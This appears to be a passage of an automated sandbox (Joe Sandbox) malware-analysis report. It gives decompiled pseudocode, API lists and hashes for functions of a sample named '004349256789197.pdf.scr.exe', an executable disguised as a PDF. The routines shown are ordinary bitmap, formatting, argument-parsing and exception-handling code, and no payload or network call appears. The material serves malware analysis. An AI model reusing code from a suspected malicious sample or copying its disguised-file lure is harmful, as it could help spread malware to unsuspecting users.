                • Instruction Fuzzy Hash: DDF01D33008068BFDF236F51EC09D9A7F2AEF64760B118415F61A5E0A1CB729A61D690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EA80C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 237COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E003EA80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t97;
				signed int _t100;
				intOrPtr* _t103;
				intOrPtr* _t106;
				short _t114;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				intOrPtr* _t130;
				signed int _t133;
				intOrPtr* _t139;
				intOrPtr* _t143;
				void* _t148;
				signed int _t150;
				intOrPtr* _t156;
				intOrPtr* _t166;
				intOrPtr* _t169;
				char _t180;
				void* _t182;
				intOrPtr* _t186;
				signed int _t198;
				long long* _t202;
				long long _t204;

				_t204 = __fp0;
				_t202 =  &_v112;
				if(E003EA699() != 0) {
					_t148 = _a4;
					GetObjectW(_t148, 0x18,  &_v68);
					_t150 = _v4;
					asm("cdq");
					_t198 = _v72 * _t150 / _v76;
					if(_t198 >= _v0) {
						_t198 = _v0;
					}
					if(_t150 != _v76 || _t198 != _v72) {
						_t180 = 0;
						_push( &_v124);
						_push(0x404754);
						_push(1);
						_push(0);
						_push(0x40555c);
						if( *0x433188() >= 0) {
							_t94 = _v144;
							 *0x403278(_t94, _t148, 0, 2,  &_v140, _t182);
							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
							_t97 = _v164;
							if(_t96 < 0) {
								L14:
								 *0x403278(_t97);
								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
								L21:
								_t100 =  *0x4330e4(_t148, _t180, _t180, _t180, _t180);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
							_t156 = _t186;
							 *0x403278(_t97,  &_v156);
							if( *_t186() < 0) {
								L13:
								_t103 = _v168;
								 *0x403278(_t103);
								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
								_t97 = _v176;
								goto L14;
							}
							_t106 = _v164;
							asm("fldz");
							 *_t202 = _t204;
							 *0x403278(_t106, _v168, 0x40556c, 0, 0, _t156, _t156, 0);
							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
								_v132 = _v84;
								_v116 = 0;
								_v128 =  ~_t198;
								_v112 = 0;
								_v124 = 1;
								_t114 = 0x20;
								_v122 = _t114;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								_v96 = 0;
								_v136 = 0x28;
								_v120 = 0;
								_v184 = 0;
								_t117 =  *0x433058(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t117;
								if(_t117 != 0) {
									_t166 = _v228;
									 *0x403278(_t166,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
									_t130 = _v224;
									 *0x403278(_t130, _v232, _v116, _t198, 3);
									 *((intOrPtr*)( *_t130 + 0x20))();
									_t133 = _v136;
									_t169 = _v244;
									_v216 = _t198;
									_v220 = _t133;
									_v228 = 0;
									_v224 = 0;
									 *0x403278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t139 = _v268;
									 *0x403278(_t139);
									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
								}
								_t118 = _v224;
								 *0x403278(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v224;
								 *0x403278(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t124 = _v236;
								 *0x403278(_t124);
								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
								_t100 = _v220;
								if(_t100 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t143 = _v196;
							 *0x403278(_t143);
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t180 = 0;
						L8:
						_t100 =  *0x4330e4(_t148, _t180, _t180, _t180, _t180);
						L23:
						return _t100;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E003EAAC9();
			}



































































                0x003ea80c
                0x003ea80c
                0x003ea816
                0x003ea82f
                0x003ea83c
                0x003ea846
                0x003ea850
                0x003ea855
                0x003ea85e
                0x003ea860
                0x003ea860
                0x003ea86c
                0x003ea87c
                0x003ea87e
                0x003ea87f
                0x003ea887
                0x003ea888
                0x003ea889
                0x003ea896
                0x003ea8a8
                0x003ea8bc
                0x003ea8c2
                0x003ea8c7
                0x003ea8cb
                0x003ea940
                0x003ea948
                0x003ea94e
                0x003eaab4
                0x003eaab9
                0x003eaabf
                0x00000000
                0x003eaabf
                0x003ea8cd
                0x003ea8d9
                0x003ea8dc
                0x003ea8de
                0x003ea8e8
                0x003ea928
                0x003ea928
                0x003ea934
                0x003ea93a
                0x003ea93c
                0x00000000
                0x003ea93c
                0x003ea8ea
                0x003ea8ee
                0x003ea8f5
                0x003ea907
                0x003ea912
                0x003ea95c
                0x003ea964
                0x003ea968
                0x003ea971
                0x003ea975
                0x003ea97a
                0x003ea97d
                0x003ea98c
                0x003ea995
                0x003ea99c
                0x003ea9a3
                0x003ea9aa
                0x003ea9b2
                0x003ea9b6
                0x003ea9ba
                0x003ea9c0
                0x003ea9c6
                0x003ea9cc
                0x003ea9dd
                0x003ea9e3
                0x003ea9e5
                0x003ea9fd
                0x003eaa03
                0x003eaa06
                0x003eaa11
                0x003eaa15
                0x003eaa1c
                0x003eaa23
                0x003eaa27
                0x003eaa3b
                0x003eaa46
                0x003eaa56
                0x003eaa48
                0x003eaa4c
                0x003eaa4c
                0x003eaa5c
                0x003eaa68
                0x003eaa6e
                0x003eaa6e
                0x003eaa70
                0x003eaa7c
                0x003eaa82
                0x003eaa84
                0x003eaa90
                0x003eaa96
                0x003eaa98
                0x003eaaa4
                0x003eaaaa
                0x003eaaac
                0x003eaab2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003eaab2
                0x003ea914
                0x003ea920
                0x003ea926
                0x00000000
                0x003ea926
                0x00000000
                0x003ea874
                0x003ea874
                0x003ea898
                0x003ea89d
                0x003eaac0
                0x00000000
                0x003eaac2
                0x003ea86c
                0x003ea818
                0x003ea81c
                0x003ea820
                0x00000000

                APIs
                  • Part of subcall function 003EA699: GetDC.USER32(00000000), ref: 003EA69D
                  • Part of subcall function 003EA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 003EA6A8
                  • Part of subcall function 003EA699: ReleaseDC.USER32(00000000,00000000), ref: 003EA6B3
                • GetObjectW.GDI32(?,00000018,?), ref: 003EA83C
                  • Part of subcall function 003EAAC9: GetDC.USER32(00000000), ref: 003EAAD2
                  • Part of subcall function 003EAAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,003EA829,?,?,?), ref: 003EAB01
                  • Part of subcall function 003EAAC9: ReleaseDC.USER32(00000000,?), ref: 003EAB99
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: ">$(
                • API String ID: 1061551593-3044792024
                • Opcode ID: e27be849a28565314ba86884bead11d9a092e2e1ad23d0f43f8f3314aea95cf2
                • Instruction ID: 9cdb110bb02278f49608eb20700dd51693352134a485cb2fca00c6d2c14ed26d
                • Opcode Fuzzy Hash: e27be849a28565314ba86884bead11d9a092e2e1ad23d0f43f8f3314aea95cf2
                • Instruction Fuzzy Hash: 3891EF71608794AFD611DF25C848E2BBBF8FF89701F00496EF59AD7260DB30A945CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                Download Yara Rule
                C-Code - Quality: 19%
                			E003E15FE(intOrPtr* __ecx) {
				char _v516;
				char _v5124;
				signed int _t33;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				void* _t61;
				void* _t62;

				E003EEC50(0x1400);
				_t57 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_t61 = _t33 - 0x74;
				if(_t61 > 0) {
					__eflags = _t33 - 0x83;
					if(_t33 == 0x83) {
						E003ED694();
						__eflags =  *(_t57 + 4);
						if( *(_t57 + 4) == 0) {
							E003E0602( &_v5124, E003DE617(0xc9), 0xa00);
						} else {
							E003D4092( &_v5124, 0xa00, E003DE617(0xca),  *(_t57 + 4));
						}
						return E003EA7E4( *0x418450,  &_v5124, E003DE617(0x96), 0);
					}
				} else {
					if(_t61 == 0) {
						_push(0x456);
						L38:
						_push(E003DE617());
						_push( *_t57);
						L19:
						_t45 = E003EB776();
						L11:
						return _t45;
					}
					_t62 = _t33 - 0x16;
					if(_t62 > 0) {
						__eflags = _t33 - 0x38;
						if(__eflags > 0) {
							_t46 = _t33 - 0x39;
							__eflags = _t46;
							if(_t46 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t47 = _t46 - 1;
							__eflags = _t47;
							if(_t47 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t48 = _t47 - 1;
							__eflags = _t48;
							if(_t48 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t51 = _t48 - 9;
							__eflags = _t51;
							if(_t51 == 0) {
								_push(0x343);
								goto L38;
							}
							_t33 = _t51 - 1;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t33 = _t33 - 0x17;
							__eflags = _t33 - 0xb;
							if(_t33 <= 0xb) {
								switch( *((intOrPtr*)(_t33 * 4 +  &M003E190E))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L64;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E003DE617(0xc8) =  &_v516;
										__eax = E003D4092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E003EB776( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t62 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E003DE617();
							L7:
							_push(0);
							L8:
							return E003EB776();
						}
						if(_t33 <= 0x15) {
							switch( *((intOrPtr*)(_t33 * 4 +  &M003E18B6))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E003EAECD();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E003DE617());
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L64;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E003DE617(0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E003DE617());
									_push( *_t57);
									goto L8;
							}
						}
					}
				}
				L64:
				return _t33;
			}













                0x003e1606
                0x003e160c
                0x003e160e
                0x003e1611
                0x003e1614
                0x003e183f
                0x003e1844
                0x003e1846
                0x003e184b
                0x003e184f
                0x003e188c
                0x003e1851
                0x003e186b
                0x003e1870
                0x00000000
                0x003e18ab
                0x003e161a
                0x003e161a
                0x003e1835
                0x003e175e
                0x003e1763
                0x003e1764
                0x003e16a1
                0x003e16a1
                0x003e166a
                0x00000000
                0x003e166a
                0x003e1620
                0x003e1623
                0x003e1723
                0x003e1726
                0x003e17e6
                0x003e17e6
                0x003e17e9
                0x003e182b
                0x00000000
                0x003e182b
                0x003e17eb
                0x003e17eb
                0x003e17ee
                0x003e1824
                0x00000000
                0x003e1824
                0x003e17f0
                0x003e17f0
                0x003e17f3
                0x003e1817
                0x003e181a
                0x00000000
                0x003e181a
                0x003e17f5
                0x003e17f5
                0x003e17f8
                0x003e180d
                0x00000000
                0x003e180d
                0x003e17fa
                0x003e17fa
                0x003e17fd
                0x003e1803
                0x00000000
                0x003e1803
                0x003e172c
                0x003e172c
                0x003e17df
                0x00000000
                0x003e17df
                0x003e1732
                0x003e1735
                0x003e1738
                0x003e173e
                0x00000000
                0x003e1745
                0x00000000
                0x00000000
                0x003e174f
                0x00000000
                0x00000000
                0x003e1759
                0x00000000
                0x00000000
                0x003e176b
                0x00000000
                0x00000000
                0x003e176f
                0x00000000
                0x00000000
                0x003e1773
                0x003e1776
                0x00000000
                0x00000000
                0x003e177d
                0x00000000
                0x00000000
                0x003e1784
                0x00000000
                0x00000000
                0x003e178b
                0x003e178e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e1798
                0x003e179b
                0x00000000
                0x00000000
                0x003e17b0
                0x003e17bc
                0x003e17c1
                0x003e17c4
                0x003e17ca
                0x00000000
                0x00000000
                0x003e173e
                0x003e1738
                0x003e1629
                0x003e1629
                0x003e171a
                0x003e171c
                0x003e16be
                0x003e16be
                0x003e1646
                0x003e1646
                0x003e1648
                0x00000000
                0x003e164d
                0x003e1632
                0x003e1638
                0x00000000
                0x003e1655
                0x003e1657
                0x003e165c
                0x00000000
                0x00000000
                0x003e163f
                0x003e1641
                0x00000000
                0x00000000
                0x003e1663
                0x003e1665
                0x00000000
                0x00000000
                0x003e1670
                0x003e1673
                0x00000000
                0x00000000
                0x003e167f
                0x003e1682
                0x00000000
                0x00000000
                0x003e1686
                0x003e1689
                0x00000000
                0x00000000
                0x003e168d
                0x003e1690
                0x00000000
                0x00000000
                0x003e1697
                0x003e1699
                0x003e169e
                0x003e169f
                0x00000000
                0x00000000
                0x003e16a9
                0x003e16ac
                0x00000000
                0x00000000
                0x003e16b0
                0x003e16b3
                0x00000000
                0x00000000
                0x003e16b7
                0x003e16b9
                0x00000000
                0x00000000
                0x003e16c6
                0x003e16c8
                0x00000000
                0x00000000
                0x003e16cf
                0x003e16d2
                0x00000000
                0x00000000
                0x003e16d9
                0x003e16dc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e16e3
                0x003e16e6
                0x003e16ee
                0x00000000
                0x00000000
                0x003e1703
                0x003e1706
                0x00000000
                0x00000000
                0x003e170d
                0x003e1710
                0x003e1675
                0x003e167a
                0x003e167b
                0x00000000
                0x00000000
                0x003e1638
                0x003e1632
                0x003e1623
                0x003e18b2
                0x003e18b2

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 7a7a14c2b168a892da725854f0e390b0cd1e41bb19d862dc0d6ad7591e328380
                • Instruction ID: bd6264c5817456935555d8218dd2daaf8297c79dbe8bcae8923ec935eb306810
                • Opcode Fuzzy Hash: 7a7a14c2b168a892da725854f0e390b0cd1e41bb19d862dc0d6ad7591e328380
                • Instruction Fuzzy Hash: 5951FB762483F0F7EA2326928D46F36B66DAB15F04F244707F7D66C8D1C5B2A410A71A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E003F7F6E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E003FBB30(_t52);
					GetModuleFileNameA(0, 0x432128, 0x104);
					_t49 =  *0x4326d8; // 0x2b52450
					 *0x4326e0 = 0x432128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x432128;
					}
					_v8 = 0;
					_v16 = 0;
					E003F8092(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E003F8207(_v8, _v16, 1);
					if(_t64 != 0) {
						E003F8092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E003FB643(_t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x4326cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x4326d0 = _t59;
									L16:
									E003F8DCC(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x4326cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x4326d0 = _t43;
						goto L10;
					} else {
						_t44 = E003F91A8();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E003F8DCC(_t64);
						return _t50;
					}
				} else {
					_t45 = E003F91A8();
					_t65 = 0x16;
					 *_t45 = _t65;
					E003F9087();
					return _t65;
				}
			}


















                0x003f7f6e
                0x003f7f7b
                0x003f7f9b
                0x003f7fae
                0x003f7fb4
                0x003f7fba
                0x003f7fc2
                0x003f7fc9
                0x003f7fc9
                0x003f7fce
                0x003f7fd5
                0x003f7fdc
                0x003f7fee
                0x003f7ff5
                0x003f8014
                0x003f8020
                0x003f803b
                0x003f803e
                0x003f8045
                0x003f804b
                0x003f8052
                0x003f8055
                0x003f8057
                0x003f805b
                0x003f8065
                0x003f8065
                0x003f8067
                0x003f806d
                0x003f8070
                0x003f8072
                0x003f8078
                0x003f8079
                0x003f807f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f805d
                0x003f805d
                0x003f805d
                0x003f8060
                0x003f8061
                0x00000000
                0x003f805d
                0x003f804d
                0x00000000
                0x003f804d
                0x003f8026
                0x003f802b
                0x003f802d
                0x003f802f
                0x00000000
                0x003f7ff7
                0x003f7ff7
                0x003f7ffc
                0x003f7ffe
                0x003f7fff
                0x003f8034
                0x003f8034
                0x003f8082
                0x003f8083
                0x00000000
                0x003f808c
                0x003f7f83
                0x003f7f83
                0x003f7f8a
                0x003f7f8b
                0x003f7f8d
                0x00000000
                0x003f7f92

                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\004349256789197.pdf.scr.exe,00000104), ref: 003F7FAE
                • _free.LIBCMT ref: 003F8079
                • _free.LIBCMT ref: 003F8083
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\004349256789197.pdf.scr.exe
                • API String ID: 2506810119-1002901006
                • Opcode ID: badea8623bcf8343d060b2184880eb7fbd967ead6e0794ca3378d7f627ef85a5
                • Instruction ID: bc17597006ac3108a7639436dd8dcc6f3c09fb857a0602272e8c731a963a3f9e
                • Opcode Fuzzy Hash: badea8623bcf8343d060b2184880eb7fbd967ead6e0794ca3378d7f627ef85a5
                • Instruction Fuzzy Hash: 6231AFB1A0021EBFDB26DF95DD819AEBBBCEF85310F514066F6049B210DBB08E448B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E003F31D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed int _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				_t132 =  *_t96 - 0x80000003;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E003F2AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
					_t133 =  *((intOrPtr*)(_t75 + 8));
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E003F2AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E003F0961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E003F0894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E003F2DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E003F8D24(_t96, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					__eflags = _t78;
					if(_t78 == 0) {
						L41:
						_t80 = 1;
						__eflags = 1;
					} else {
						_t101 = _t78 + 8;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							goto L41;
						} else {
							__eflags =  *_t111 & 0x00000080;
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0) {
								L23:
								_t97 = _t116[4];
								_t123 = 0;
								__eflags = _t78 - _t97;
								if(_t78 == _t97) {
									L33:
									__eflags =  *_t116 & 0x00000002;
									if(( *_t116 & 0x00000002) == 0) {
										L35:
										_t81 = _a8;
										__eflags =  *_t81 & 0x00000001;
										if(( *_t81 & 0x00000001) == 0) {
											L37:
											__eflags =  *_t81 & 0x00000002;
											if(( *_t81 & 0x00000002) == 0) {
												L39:
												_t123 = 1;
												__eflags = 1;
											} else {
												__eflags =  *_t111 & 0x00000002;
												if(( *_t111 & 0x00000002) != 0) {
													goto L39;
												}
											}
										} else {
											__eflags =  *_t111 & 0x00000001;
											if(( *_t111 & 0x00000001) != 0) {
												goto L37;
											}
										}
									} else {
										__eflags =  *_t111 & 0x00000008;
										if(( *_t111 & 0x00000008) != 0) {
											goto L35;
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										__eflags = _t98 -  *_t82;
										if(_t98 !=  *_t82) {
											break;
										}
										__eflags = _t98;
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												__eflags = _t99;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										__eflags = _t83;
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									__eflags = _t83;
									goto L31;
								}
							} else {
